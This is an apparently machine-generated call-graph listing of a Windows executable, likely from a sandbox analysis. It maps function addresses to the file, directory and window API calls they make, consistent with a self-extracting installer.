API calls 8640->8641 8642 403f9d 8641->8642 8643 402771 2 API calls 8642->8643 8644 403faa 8643->8644 8645 403e41 3 API calls 8644->8645 8646 403fba ??3@YAXPAX 8645->8646 8647 4013a9 2 API calls 8646->8647 8648 403fce 8647->8648 8649 4027c2 2 API calls 8648->8649 8650 403fdb 8649->8650 8651 402771 2 API calls 8650->8651 8652 403fe8 8651->8652 8653 403e41 3 API calls 8652->8653 8654 403ff8 ??3@YAXPAX 8653->8654 8655 402771 2 API calls 8654->8655 8656 40400f 8655->8656 8657 403e41 3 API calls 8656->8657 8658 40401e ??3@YAXPAX ??3@YAXPAX 8657->8658 8658->8592 8660 401458 2 API calls 8659->8660 8661 404040 8660->8661 8662 4013a9 2 API calls 8661->8662 8663 40404b 8662->8663 8664 4027c2 2 API calls 8663->8664 8665 404058 8664->8665 8666 402771 2 API calls 8665->8666 8667 404065 8666->8667 8668 403e41 3 API calls 8667->8668 8669 404075 ??3@YAXPAX 8668->8669 8670 4013a9 2 API calls 8669->8670 8671 404089 8670->8671 8672 4027c2 2 API calls 8671->8672 8673 404096 8672->8673 8674 402771 2 API calls 8673->8674 8675 4040a3 8674->8675 8676 403e41 3 API calls 8675->8676 8677 4040b3 ??3@YAXPAX 8676->8677 8678 402771 2 API calls 8677->8678 8679 4040ca 8678->8679 8680 403e41 3 API calls 8679->8680 8681 4040d9 ??3@YAXPAX ??3@YAXPAX 8680->8681 8681->8594 8683 402771 2 API calls 8682->8683 8684 404100 8683->8684 8685 403e41 3 API calls 8684->8685 8686 404111 ??3@YAXPAX 8685->8686 8686->8596 8701 409f00 8702 40275c 48 API calls 8701->8702 8703 409f0a 8702->8703 8687 40ba20 8689 40ba3d 8687->8689 8688 40ba4c 8689->8688 8692 409f60 8689->8692 8693 409f6a 8692->8693 8697 409f8a 8693->8697 8698 401d13 8693->8698 8696 40275c 48 API calls 8696->8697 8699 401d20 8698->8699 8700 401d1a free 8698->8700 8699->8696 8700->8699 8705 40f227 _EH_prolog 8713 40f25a 8705->8713 8706 40f27c 8707 40f387 8740 4011d1 8707->8740 8709 40f3b1 8714 40f3be ??2@YAPAXI 8709->8714 8710 40f39c 8793 40ef85 8710->8793 8711 40f040 _CxxThrowException ??2@YAPAXI memcpy ??3@YAXPAX 8711->8713 8713->8706 8713->8707 8713->8711 8715 40f1fd 8 API calls 8713->8715 8717 40ce5c VirtualFree free ??3@YAXPAX ??3@YAXPAX ctype 8713->8717 8786 40f117 8713->8786 8790 40ef63 8713->8790 8733 40f3d8 8714->8733 8715->8713 8717->8713 8719 40f422 8796 40f090 8719->8796 8720 40f485 ??2@YAPAXI 8720->8733 8722 40f090 3 API calls 8722->8733 8726 40ef85 ctype 3 API calls 8726->8733 8728 40f502 8729 40f090 3 API calls 8728->8729 8730 40f527 8729->8730 8731 40ef85 ctype 3 API calls 8730->8731 8731->8706 8733->8706 8733->8719 8733->8720 8733->8722 8733->8726 8733->8728 8734 40f5c5 8733->8734 8750 40faff 8733->8750 8754 40e9ef 8733->8754 8799 40f776 ??2@YAPAXI 8733->8799 8801 40faac 8733->8801 8736 40f090 3 API calls 8734->8736 8737 40f5e4 8736->8737 8738 40ef85 ctype 3 API calls 8737->8738 8738->8706 8741 401235 SendMessageW 8740->8741 8742 4011df GetDiskFreeSpaceExW 8740->8742 8748 40121d 8741->8748 8742->8741 8743 4011f7 8742->8743 8743->8741 8744 402187 19 API calls 8743->8744 8745 401210 8744->8745 8746 408d52 27 API calls 8745->8746 8747 401216 8746->8747 8747->8748 8749 40122e 8747->8749 8748->8709 8748->8710 8749->8741 8751 40fb28 8750->8751 8805 40f962 8751->8805 9082 410a40 8754->9082 8757 40ea0c 8757->8733 8759 40eb20 9100 40e6d7 8759->9100 8760 40ea58 ??2@YAPAXI 8769 40ea40 8760->8769 8762 40ea7c ??2@YAPAXI 8762->8769 8769->8759 8769->8760 8769->8762 9155 40e45f ??2@YAPAXI 8769->9155 8787 40f126 8786->8787 8789 40f12c 8786->8789 8787->8713 8788 40f142 _CxxThrowException 8788->8787 8789->8787 8789->8788 8791 40cde2 4 API calls 8790->8791 8792 40ef6b 8791->8792 8792->8713 8794 40cdda ctype 3 API calls 8793->8794 8795 40ef93 8794->8795 8797 40e4dd ctype 3 API calls 8796->8797 8798 40f09b 8797->8798 8800 40f7a8 8799->8800 8800->8733 8803 40fab1 8801->8803 8802 40fad8 8802->8733 8803->8802 8804 40f841 112 API calls 8803->8804 8804->8803 8806 40f967 8805->8806 8807 40f99d 8806->8807 8809 40f841 8806->8809 8807->8733 8810 40f85b 8809->8810 8814 401815 8810->8814 8877 40ca28 8810->8877 8811 40f88f 8811->8806 8815 401831 8814->8815 8821 401827 8814->8821 8880 41017a _EH_prolog 8815->8880 8817 40185e 8924 40cb68 8817->8924 8818 401458 2 API calls 8819 401877 8818->8819 8822 401b51 ??3@YAXPAX 8819->8822 8823 40188c 8819->8823 8821->8811 8827 40cb68 VariantClear 8822->8827 8906 401370 8823->8906 8826 401897 8910 401551 8826->8910 8827->8821 8830 4013a9 2 API calls 8831 4018b6 ??3@YAXPAX 8830->8831 8836 4018c8 8831->8836 8856 401b17 ??3@YAXPAX 8831->8856 8833 40cb68 VariantClear 8833->8821 8834 4018e9 8835 40cb68 VariantClear 8834->8835 8837 4018f1 ??3@YAXPAX 8835->8837 8836->8834 8838 401953 8836->8838 8839 401914 8836->8839 8837->8817 8841 401991 8838->8841 8842 401978 8838->8842 8840 40cb68 VariantClear 8839->8840 8843 401926 ??3@YAXPAX 8840->8843 8845 4019b3 GetLocalTime SystemTimeToFileTime 8841->8845 8846 401999 8841->8846 8844 40cb68 VariantClear 8842->8844 8843->8817 8847 401980 ??3@YAXPAX 8844->8847 8845->8846 8846->8839 8848 4019d0 8846->8848 8849 4019e7 8846->8849 8847->8817 8928 4036f1 lstrlenW 8848->8928 8915 403387 GetFileAttributesW 8849->8915 8853 401b23 GetLastError 8853->8856 8854 401a07 ??2@YAPAXI 8857 401a13 8854->8857 8855 401b19 8855->8853 8856->8833 8952 40ca5c 8857->8952 8860 401afe 8863 40cb68 VariantClear 8860->8863 8861 401a4e GetLastError 8955 40133e 8861->8955 8863->8856 8864 401a60 8865 4036f1 88 API calls 8864->8865 8869 401a6e ??3@YAXPAX 8864->8869 8867 401abb 8865->8867 8867->8869 8870 40ca5c 2 API calls 8867->8870 8868 401a8b 8871 40cb68 VariantClear 8868->8871 8869->8868 8872 401ae0 8870->8872 8873 401a99 ??3@YAXPAX 8871->8873 8874 401ae4 GetLastError 8872->8874 8875 401af5 ??3@YAXPAX 8872->8875 8873->8817 8874->8869 8875->8860 9074 40c95f 8877->9074 8881 410283 8880->8881 8882 4101b5 8880->8882 8883 4101d2 8881->8883 8884 410288 8881->8884 8882->8883 8885 4101c4 8882->8885 8886 41024f 8882->8886 8893 4101f8 8883->8893 8984 40fefb 8883->8984 8889 410292 8884->8889 8892 4101e4 8884->8892 8894 41023d 8884->8894 8887 4101c9 8885->8887 8885->8894 8886->8893 8958 4132af 8886->8958 8898 4101cf 8887->8898 8904 4101fd 8887->8904 8889->8894 8889->8904 8892->8893 8972 40cc18 8892->8972 8967 40cb6d 8893->8967 8980 40cbf3 8894->8980 8897 410265 8961 40cbac 8897->8961 8898->8883 8898->8892 8899 40cb68 VariantClear 8903 40185a 8899->8903 8903->8817 8903->8818 8904->8893 8976 40cc38 8904->8976 8907 401387 8906->8907 8908 401172 2 API calls 8907->8908 8909 401392 8908->8909 8909->8826 8911 40133e 2 API calls 8910->8911 8912 40155f 8911->8912 8999 401429 8912->8999 8914 40156a 8914->8830 8916 4033a4 8915->8916 8920 4019f3 8915->8920 8917 4033a8 SetLastError 8916->8917 8918 4033b5 8916->8918 8917->8920 8919 4033be 8918->8919 8918->8920 8921 4033cc FindFirstFileW 8918->8921 9002 40335a 8919->9002 8920->8853 8920->8854 8920->8855 8921->8919 8923 4033df FindClose CompareFileTime 8921->8923 8923->8919 8923->8920 8927 40cb24 8924->8927 8925 40cb45 VariantClear 8925->8821 8926 40cb5c 8926->8821 8927->8925 8927->8926 8929 402771 2 API calls 8928->8929 8930 403712 8929->8930 8931 401172 2 API calls 8930->8931 8932 403722 8930->8932 8931->8932 8934 403770 GetSystemTimeAsFileTime GetFileAttributesW 8932->8934 8937 403814 8932->8937 9043 401b75 CreateDirectoryW 8932->9043 8935 403785 8934->8935 8936 40378f 8934->8936 8938 403387 22 API calls 8935->8938 8939 401b75 4 API calls 8936->8939 8942 403795 ??3@YAXPAX 8936->8942 8940 403844 8937->8940 8937->8942 8938->8936 8950 4037a2 8939->8950 8941 408dbf 57 API calls 8940->8941 8947 40384e ??3@YAXPAX 8941->8947 8949 403859 8942->8949 8943 4037a7 9049 408dbf 8943->9049 8945 403808 ??3@YAXPAX 8945->8949 8946 4037ba memcpy 8946->8950 8947->8949 8949->8839 8950->8943 8950->8945 8950->8946 8951 401b75 4 API calls 8950->8951 8951->8950 9071 40ca45 8952->9071 8956 401172 2 API calls 8955->8956 8957 401358 8956->8957 8957->8864 8959 40133e 2 API calls 8958->8959 8960 4132bc 8959->8960 8960->8897 8988 40cb96 8961->8988 8964 40cbd1 8965 40cbec ??3@YAXPAX 8964->8965 8966 40cbd6 _CxxThrowException 8964->8966 8965->8893 8966->8965 8968 40cb24 VariantClear 8967->8968 8969 40cb79 8968->8969 8970 40cb92 8969->8970 8971 40cb7d memcpy 8969->8971 8970->8899 8971->8970 8973 40cc21 8972->8973 8974 40cc26 8972->8974 8975 40cb96 VariantClear 8973->8975 8974->8893 8975->8974 8977 40cc41 8976->8977 8978 40cc46 8976->8978 8979 40cb96 VariantClear 8977->8979 8978->8893 8979->8978 8981 40cc01 8980->8981 8982 40cbfc 8980->8982 8981->8893 8983 40cb96 VariantClear 8982->8983 8983->8981 8985 40ff0d 8984->8985 8986 40ff29 8985->8986 8995 40cc5f 8985->8995 8986->8893 8991 40cb24 8988->8991 8990 40cb9e SysAllocString 8990->8964 8990->8965 8994 40cb2c 8991->8994 8992 40cb45 VariantClear 8992->8990 8993 40cb5c 8993->8990 8994->8992 8994->8993 8996 40cc68 8995->8996 8998 40cc6d 8995->8998 8997 40cb96 VariantClear 8996->8997 8997->8998 8998->8986 9000 4013df 2 API calls 8999->9000 9001 401439 9000->9001 9001->8914 9008 402ff3 9002->9008 9004 403363 9005 403384 9004->9005 9006 403368 GetLastError 9004->9006 9005->8920 9007 403373 9006->9007 9007->8920 9009 403000 GetFileAttributesW 9008->9009 9010 402ffc 9008->9010 9011 403011 9009->9011 9012 403016 9009->9012 9010->9004 9011->9004 9013 403034 9012->9013 9014 40301a SetFileAttributesW 9012->9014 9019 402ee6 9013->9019 9015 403030 9014->9015 9016 403027 DeleteFileW 9014->9016 9015->9004 9016->9004 9020 402771 2 API calls 9019->9020 9021 402efd 9020->9021 9022 4027c2 2 API calls 9021->9022 9023 402f0a FindFirstFileW 9022->9023 9024 402fc2 SetFileAttributesW 9023->9024 9038 402f2c 9023->9038 9026 402fe5 ??3@YAXPAX 9024->9026 9027 402fcd RemoveDirectoryW 9024->9027 9025 401370 2 API calls 9025->9038 9029 402fed 9026->9029 9027->9026 9028 402fda ??3@YAXPAX 9027->9028 9028->9029 9029->9004 9031 4027c2 2 API calls 9031->9038 9032 402f91 SetFileAttributesW 9032->9026 9036 402f9a DeleteFileW 9032->9036 9033 402f5c lstrcmpW 9034 402f72 lstrcmpW 9033->9034 9035 402fa5 FindNextFileW 9033->9035 9034->9035 9034->9038 9037 402fbb FindClose 9035->9037 9035->9038 9036->9038 9037->9024 9038->9025 9038->9026 9038->9031 9038->9032 9038->9033 9038->9035 9039 402ee6 2 API calls 9038->9039 9040 401526 9038->9040 9039->9038 9041 4013df 2 API calls 9040->9041 9042 401530 9041->9042 9042->9038 9044 401bb6 9043->9044 9045 401b86 GetLastError 9043->9045 9044->8932 9046 401ba0 GetFileAttributesW 9045->9046 9048 401b95 9045->9048 9046->9044 9046->9048 9047 401b96 SetLastError 9047->8932 9048->9044 9048->9047 9050 402187 19 API calls 9049->9050 9051 408dd3 wvsprintfW 9050->9051 9052 408ea2 9051->9052 9053 408df4 GetLastError FormatMessageW 9051->9053 9056 408cdb 27 API calls 9052->9056 9054 408e22 FormatMessageW 9053->9054 9055 408e37 lstrlenW lstrlenW ??2@YAPAXI lstrcpyW lstrcpyW 9053->9055 9054->9052 9054->9055 9060 408cdb 9055->9060 9058 408eae 9056->9058 9058->8942 9061 408d50 ??3@YAXPAX LocalFree 9060->9061 9062 408cea 9060->9062 9061->9058 9063 407c87 4 API calls 9062->9063 9064 408cf9 IsWindow 9063->9064 9065 408d10 IsBadReadPtr 9064->9065 9068 408d22 9064->9068 9065->9068 9066 407ce8 22 API calls 9067 408d48 9066->9067 9070 407a5b ??3@YAXPAX 9067->9070 9068->9066 9070->9061 9072 40ca28 2 API calls 9071->9072 9073 401a46 9072->9073 9073->8860 9073->8861 9079 40c88e 9074->9079 9077 40c993 9077->8811 9078 40c96e CreateFileW 9078->9077 9080 40c898 CloseHandle 9079->9080 9081 40c8a3 9079->9081 9080->9081 9081->9077 9081->9078 9083 410a59 9082->9083 9098 40ea08 9082->9098 9083->9098 9185 410817 9083->9185 9085 410c33 9086 40ce5c ctype 4 API calls 9085->9086 9086->9098 9088 410817 7 API calls 9089 410af5 9088->9089 9089->9085 9090 410b25 9089->9090 9192 40ce5c 9090->9192 9092 410b2e 9093 410bab 9092->9093 9095 4107a2 _CxxThrowException ??2@YAPAXI memcpy ??3@YAXPAX 9092->9095 9093->9093 9094 40ce5c ctype 4 API calls 9093->9094 9096 410be7 9094->9096 9095->9092 9097 40ce5c ctype 4 API calls 9096->9097 9097->9098 9098->8757 9099 406eb0 InitializeCriticalSection 9098->9099 9099->8769 9226 40e214 9100->9226 9156 40e46e 9155->9156 9157 4107a2 4 API calls 9156->9157 9158 40e485 9157->9158 9158->8769 9186 40cdda ctype 3 API calls 9185->9186 9187 410823 9186->9187 9196 40cd11 9187->9196 9189 41082d 9190 41083f 9189->9190 9191 40ef63 4 API calls 9189->9191 9190->9085 9190->9088 9191->9189 9193 40ce3b 9192->9193 9204 40ccfd 9193->9204 9197 40cda5 9196->9197 9199 40cd24 9196->9199 9197->9189 9198 40cd33 _CxxThrowException 9198->9199 9199->9198 9200 40cd63 ??2@YAPAXI 9199->9200 9201 40cd95 ??3@YAXPAX 9199->9201 9200->9199 9202 40cd79 memcpy 9200->9202 9201->9197 9202->9201 9210 409f10 9204->9210 9213 401cfa 9204->9213 9216 40c7e0 9204->9216 9222 40b880 9204->9222 9205 40cd0e ??3@YAXPAX 9205->9092 9211 401d13 free 9210->9211 9212 409f1a 9211->9212 9212->9205 9214 401d01 VirtualFree 9213->9214 9215 401d12 9213->9215 9214->9215 9215->9205 9217 40c805 9216->9217 9218 401d13 free 9217->9218 9219 40c80e 9218->9219 9220 40c830 9219->9220 9221 40c827 ??3@YAXPAX 9219->9221 9220->9205 9221->9220 9223 40b8a6 9222->9223 9224 401d13 free 9223->9224 9225 40b8cc 9224->9225 9225->9205 9227 40cdda ctype 3 API calls 9226->9227 9228 40e21c 9227->9228 9229 40cdda ctype 3 API calls 9228->9229 9230 40e224 9229->9230 9231 40cdda ctype 3 API calls 9230->9231 9232 40e22c 9231->9232 9497 41382f __set_app_type __p__fmode __p__commode 9498 41389e 9497->9498 9499 4138b2 9498->9499 9500 4138a6 __setusermatherr 9498->9500 9509 4139a6 _controlfp 9499->9509 9500->9499 9502 4138b7 _initterm __getmainargs _initterm 9503 41390b GetStartupInfoA 9502->9503 9505 41393f GetModuleHandleA 9503->9505 9510 406d72 _EH_prolog 9505->9510 9509->9502 9513 405721 ?_set_new_handler@@YAP6AHI@ZP6AHI@Z 9510->9513 9868 401d21 GetModuleHandleW CreateWindowExW 9513->9868 9516 406d51 MessageBoxA 9518 406d68 exit _XcptFilter 9516->9518 9517 40575f 9517->9516 9519 405779 9517->9519 9520 401458 2 API calls 9519->9520 9521 4057b0 9520->9521 9522 401458 2 API calls 9521->9522 9523 4057bb 9522->9523 9871 4044c6 9523->9871 9528 4027c2 2 API calls 9529 4057f9 9528->9529 9880 402dd6 9529->9880 9531 405802 9894 4043f8 9531->9894 9535 405821 _wtol 9537 405837 9535->9537 9899 404903 #17 9537->9899 9538 4043f8 3 API calls 9539 405867 9538->9539 9540 4058a1 9539->9540 9541 40586d 9539->9541 9543 4043f8 3 API calls 9540->9543 10100 404e99 9541->10100 9544 4058ac 9543->9544 9546 4058b2 9544->9546 9547 4058bd 9544->9547 9545 405874 ??3@YAXPAX 10117 404513 9545->10117 10122 4052a7 9546->10122 9549 4043f8 3 API calls 9547->9549 9553 4058cc 9549->9553 9551 405885 ??3@YAXPAX ??3@YAXPAX 9551->9518 9552 405901 GetModuleFileNameW 9555 405913 9552->9555 9556 405925 9552->9556 9553->9552 9554 401172 2 API calls 9553->9554 9554->9552 9557 408dbf 57 API calls 9555->9557 9558 4043f8 3 API calls 9556->9558 9563 405872 9557->9563 9570 405947 9558->9570 9559 405ae3 9560 4013a9 2 API calls 9559->9560 9561 405af3 9560->9561 9562 4013a9 2 API calls 9561->9562 9567 405b00 9562->9567 9563->9545 9564 405a05 9564->9563 9565 405a38 9564->9565 9569 405a21 _wtol 9564->9569 9566 4043f8 3 API calls 9565->9566 9578 405a97 9566->9578 9568 405b85 9567->9568 9572 401370 2 API calls 9567->9572 9925 4023a0 9568->9925 9569->9565 9570->9559 9570->9563 9570->9564 9570->9565 9577 401526 2 API calls 9570->9577 9574 405b35 9572->9574 9576 401370 2 API calls 9574->9576 9575 401370 2 API calls 9579 405bab ??2@YAPAXI 9575->9579 9583 405b4b 9576->9583 9577->9570 9578->9559 9580 404a97 2 API calls 9578->9580 9581 405bb7 9579->9581 9582 405ac8 9580->9582 9928 40c9d7 9581->9928 9582->9559 9584 4013a9 2 API calls 9582->9584 9585 4013a9 2 API calls 9583->9585 9584->9559 9586 405b75 9585->9586 9588 402187 19 API calls 9586->9588 9590 405b7c 9588->9590 9593 4027c2 2 API calls 9590->9593 9591 405be4 9594 408dbf 57 API calls 9591->9594 9592 405c0a 9931 402823 9592->9931 9593->9568 9594->9563 9598 405c1f 9599 405c25 9598->9599 9600 405c49 9598->9600 9602 408dbf 57 API calls 9599->9602 9601 405cdb 9600->9601 9604 4043f8 3 API calls 9600->9604 9605 40cdda ctype 3 API calls 9601->9605 9603 405c2d ??3@YAXPAX 9602->9603 9603->9563 9606 405c60 9604->9606 9607 405ce3 9605->9607 9606->9601 9616 405c66 9606->9616 9608 405d08 9607->9608 10156 403400 9607->10156 9610 405d11 9608->9610 9611 405cbf ??3@YAXPAX 9608->9611 9614 405d82 9610->9614 9615 405d1d wsprintfW 9610->9615 9621 401458 2 API calls 9610->9621 9624 401370 ??2@YAPAXI ??3@YAXPAX 9610->9624 9626 402187 19 API calls 9610->9626 10185 4032d9 ??2@YAPAXI 9610->10185 10191 40269a ??3@YAXPAX ??3@YAXPAX 9610->10191 9611->9563 9613 405cfd ??3@YAXPAX 9613->9563 9965 404b06 9614->9965 9618 401458 2 API calls 9615->9618 9616->9611 10130 4054c1 9616->10130 9618->9610 9620 405c95 9620->9611 9622 405c9b 9620->9622 9621->9610 9623 408dbf 57 API calls 9622->9623 9625 405ca3 ??3@YAXPAX 9623->9625 9624->9610 9625->9563 9626->9610 9627 406006 9628 404b06 26 API calls 9627->9628 9629 406015 9628->9629 9631 40619d 9629->9631 10217 40244e AllocateAndInitializeSid 9629->10217 10024 4026b0 9631->10024 9636 40624e 10027 4045f4 9636->10027 9638 40603a 9641 401458 2 API calls 9638->9641 9639 402771 2 API calls 9682 4061b5 9639->9682 9643 406042 9641->9643 9646 401458 2 API calls 9643->9646 9644 4062e1 CoInitialize 9652 4026b0 lstrcmpW 9644->9652 9645 406275 9648 4026b0 lstrcmpW 9645->9648 9649 40604a GetCommandLineW 9646->9649 9651 406284 9648->9651 9653 404a97 2 API calls 9649->9653 9650 406250 ??3@YAXPAX 9650->9636 9654 406294 9651->9654 9658 402187 19 API calls 9651->9658 9655 406307 9652->9655 9656 40605a 9653->9656 10226 4041ab 9654->10226 9659 40631b 9655->9659 9662 401370 2 API calls 9655->9662 9660 402771 2 API calls 9656->9660 9657 401458 ??2@YAPAXI ??3@YAXPAX 9657->9682 9658->9654 9664 4041c4 16 API calls 9659->9664 9663 406065 9660->9663 9662->9659 9668 4048a9 2 API calls 9663->9668 9669 406321 9664->9669 9666 4013a9 2 API calls 9666->9682 9667 40421b lstrlenW lstrlenW _wcsnicmp 9675 405d8b 9667->9675 9671 406083 9668->9671 9672 4026b0 lstrcmpW 9669->9672 9670 407ce8 22 API calls 9673 4062b7 9670->9673 9676 4048c7 2 API calls 9671->9676 9677 406330 9672->9677 10229 407a5b ??3@YAXPAX 9673->10229 9674 401370 2 API calls 9674->9682 9675->9627 9675->9667 9699 405f6a _wtol 9675->9699 9726 40614a ??3@YAXPAX 9675->9726 10192 404d50 9675->10192 10203 40464b 9675->10203 9683 406090 9676->9683 9679 406344 9677->9679 9680 406337 _wtol 9677->9680 9684 40636a 9679->9684 10230 408f81 9679->10230 9680->9679 9681 4062c2 ??3@YAXPAX 9681->9563 9682->9636 9682->9639 9682->9650 9682->9657 9682->9666 9682->9674 9685 4032d9 7 API calls 9682->9685 10225 40269a ??3@YAXPAX ??3@YAXPAX 9682->10225 9686 4048c7 2 API calls 9683->9686 9689 40637e 9684->9689 9691 406355 ??3@YAXPAX 9684->9691 10246 408eb4 9684->10246 9685->9682 9687 40609d 9686->9687 10220 4048e5 9687->10220 9701 401458 2 API calls 9689->9701 9705 406503 ??3@YAXPAX 9689->9705 9706 4063bc GetKeyState 9689->9706 9710 406563 9689->9710 9711 401370 ??2@YAPAXI ??3@YAXPAX 9689->9711 9712 4026b0 lstrcmpW 9689->9712 9718 401526 ??2@YAPAXI ??3@YAXPAX 9689->9718 9727 406520 9689->9727 9729 406553 ??3@YAXPAX ??3@YAXPAX 9689->9729 9730 4064f8 ??3@YAXPAX 9689->9730 10273 408461 9689->10273 10286 4084df 9689->10286 9691->9684 9695 40622b ??3@YAXPAX 9697 4026b0 lstrcmpW 9695->9697 9696 401551 2 API calls 9698 4060b7 9696->9698 9697->9682 9700 4013a9 2 API calls 9698->9700 9699->9675 9703 4060c3 7 API calls 9700->9703 9701->9689 9704 404f67 9 API calls 9703->9704 9707 40610c 9704->9707 9705->9563 9706->9689 9708 406116 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9707->9708 9709 406167 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9707->9709 9708->9563 9709->9545 9709->9563 9713 406599 9710->9713 9714 40656b 9710->9714 9711->9689 9712->9689 9716 40133e 2 API calls 9713->9716 10033 404545 9714->10033 9719 4065a7 9716->9719 9718->9689 9723 4041c4 16 API calls 9719->9723 9722 4013a9 2 API calls 9724 406588 ??3@YAXPAX 9722->9724 9725 4065b0 9723->9725 9734 4065d0 9724->9734 9728 4065c1 ??3@YAXPAX 9725->9728 9732 4013a9 2 API calls 9725->9732 9726->9563 9731 408dbf 57 API calls 9727->9731 9728->9734 9729->9563 9730->9689 9733 40652c ??3@YAXPAX ??3@YAXPAX 9731->9733 9732->9728 9733->9563 9735 40661a 9734->9735 9736 40660d 9734->9736 10294 40851f 9735->10294 10046 40172c ??2@YAPAXI 9736->10046 9739 406616 9740 406657 9739->9740 9741 40662c 9739->9741 9742 4045f4 22 API calls 9740->9742 10302 4044b0 9741->10302 9743 40665c 9742->9743 9746 406c4d 9743->9746 9747 401458 2 API calls 9743->9747 9749 406cc5 9746->9749 9750 4026b0 lstrcmpW 9746->9750 9748 40667a 9747->9748 9793 40668d 9748->9793 10306 404a41 9748->10306 9752 406d08 ??3@YAXPAX ??3@YAXPAX 9749->9752 9758 4026b0 lstrcmpW 9749->9758 9756 406c7e 9750->9756 9753 406d21 9752->9753 9754 406d27 ??3@YAXPAX 9752->9754 9753->9754 9757 404513 4 API calls 9754->9757 9755 401458 ??2@YAPAXI ??3@YAXPAX 9755->9793 9756->9749 10373 404497 9756->10373 9759 406d38 ??3@YAXPAX ??3@YAXPAX 9757->9759 9760 406ce4 9758->9760 9759->9518 9760->9752 9763 406cf1 9760->9763 9767 40133e 2 API calls 9763->9767 9764 4066bc 9768 406ae3 ??3@YAXPAX ??3@YAXPAX 9764->9768 9769 4066c9 9764->9769 9765 4026b0 lstrcmpW 9765->9793 9766 407ce8 22 API calls 9771 406cba 9766->9771 9773 406d00 9767->9773 9772 406bec 9768->9772 9770 4048c7 2 API calls 9769->9770 9774 4066e5 9770->9774 10376 407a5b ??3@YAXPAX 9771->10376 9777 406c44 ??3@YAXPAX 9772->9777 9782 4045f4 22 API calls 9772->9782 10377 405304 9773->10377 9780 4048c7 2 API calls 9774->9780 9775 406729 9781 401370 2 API calls 9775->9781 9777->9746 9784 4066f2 9780->9784 9785 406732 9781->9785 9783 406bfb 9782->9783 10363 404dae 9783->10363 9787 4013a9 2 API calls 9784->9787 9789 4041f8 20 API calls 9785->9789 9792 4066fe ??3@YAXPAX ??3@YAXPAX GetFileAttributesW 9787->9792 9788 406b49 ??3@YAXPAX ??3@YAXPAX 9788->9772 9806 40673b 9789->9806 9790 401370 2 API calls 9790->9793 9791 406c14 SetCurrentDirectoryW 9794 404dae 4 API calls 9791->9794 9795 406725 9792->9795 9796 406afa 9792->9796 9793->9755 9793->9764 9793->9765 9793->9775 9793->9788 9793->9790 9797 401526 2 API calls 9793->9797 9798 406c3c 9794->9798 9795->9775 9799 4044b0 16 API calls 9796->9799 9800 4067c9 ??3@YAXPAX ??3@YAXPAX 9797->9800 9801 4044b0 16 API calls 9798->9801 9802 406aff 9799->9802 9800->9793 9801->9777 9803 408dbf 57 API calls 9802->9803 9804 406b08 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9803->9804 9804->9563 9805 406b3e 9804->9805 9805->9563 9807 406868 _wtol 9806->9807 9808 404255 lstrlenW lstrlenW _wcsnicmp 9806->9808 9809 40692c 9806->9809 9807->9806 9808->9806 9810 406935 9809->9810 9811 406987 9809->9811 9812 40695a 9810->9812 9813 40693b 9810->9813 9814 4013a9 2 API calls 9811->9814 9815 401370 2 API calls 9812->9815 9816 401370 2 API calls 9813->9816 9817 406985 9814->9817 9819 406958 9815->9819 9818 406946 9816->9818 9820 4027c2 2 API calls 9817->9820 9822 4027c2 2 API calls 9818->9822 9821 4026b0 lstrcmpW 9819->9821 9823 406999 9820->9823 9825 40696f 9821->9825 9824 40694f 9822->9824 9826 401458 2 API calls 9823->9826 9827 4027c2 2 API calls 9824->9827 9825->9823 9830 4027c2 2 API calls 9825->9830 9828 4069a1 9826->9828 9827->9819 9829 404a97 2 API calls 9828->9829 9831 4069ae 9829->9831 9830->9817 9832 402771 2 API calls 9831->9832 9833 4069b9 9832->9833 9834 4041f8 20 API calls 9833->9834 9835 4069c2 9834->9835 9836 406a9d 9835->9836 10063 40241d 9835->10063 9837 406bcb ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9836->9837 9839 406ab1 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9836->9839 9837->9772 9839->9768 9840 4069d7 9840->9836 9841 4069f1 9840->9841 9843 4027c2 2 API calls 9840->9843 9842 4041f8 20 API calls 9841->9842 9844 406a09 9842->9844 9843->9841 9845 406a10 9844->9845 9846 406a7f 9844->9846 10072 4048a9 9845->10072 10315 40503e 9846->10315 9850 406a8d 9851 406b68 SetLastError 9850->9851 9852 406a98 9850->9852 9855 406b6f 9851->9855 10360 4023b5 9852->10360 9857 408dbf 57 API calls 9855->9857 9859 406b79 9857->9859 9858 401551 2 API calls 9860 406a45 ??3@YAXPAX ??3@YAXPAX 9858->9860 9861 4044b0 16 API calls 9859->9861 10082 404f67 9860->10082 9863 406b7e 7 API calls 9861->9863 9865 406bbe 9863->9865 9864 406a69 9866 406b60 ??3@YAXPAX 9864->9866 9867 406a77 ??3@YAXPAX 9864->9867 9865->9837 9866->9855 9867->9852 9869 401d56 SetTimer GetMessageW DispatchMessageW KillTimer KiUserCallbackDispatcher 9868->9869 9870 401d89 GetVersionExW 9868->9870 9869->9870 9870->9516 9870->9517 9872 401172 2 API calls 9871->9872 9873 4044db GetCommandLineW 9872->9873 9874 404a97 9873->9874 9875 404ad1 9874->9875 9876 404aa5 9874->9876 9877 404ac9 9875->9877 9878 401526 2 API calls 9875->9878 9876->9877 9879 401526 2 API calls 9876->9879 9877->9528 9878->9875 9879->9876 9881 401458 2 API calls 9880->9881 9887 402de6 9881->9887 9882 402ecc 9883 4013a9 2 API calls 9882->9883 9884 402ed9 ??3@YAXPAX 9883->9884 9884->9531 9886 401458 2 API calls 9886->9887 9887->9882 9887->9886 9888 401526 ??2@YAPAXI ??3@YAXPAX 9887->9888 9890 4013a9 2 API calls 9887->9890 10416 40283b 9887->10416 10419 402ad8 9887->10419 9888->9887 9891 402e46 ??3@YAXPAX 9890->9891 9892 401429 2 API calls 9891->9892 9893 402e5b ??3@YAXPAX ??3@YAXPAX 9892->9893 9893->9887 9895 404407 9894->9895 9896 404421 lstrlenW lstrlenW 9895->9896 9897 404444 9895->9897 10430 401c74 9896->10430 9897->9535 9897->9537 9900 40491a 9899->9900 9901 402131 3 API calls 9900->9901 9902 40491f 9901->9902 9903 402187 19 API calls 9902->9903 9904 404926 9903->9904 9905 402187 19 API calls 9904->9905 9906 404932 9905->9906 9907 402187 19 API calls 9906->9907 9908 40493e 9907->9908 9909 402187 19 API calls 9908->9909 9910 40494a 9909->9910 9911 402187 19 API calls 9910->9911 9912 404956 9911->9912 9913 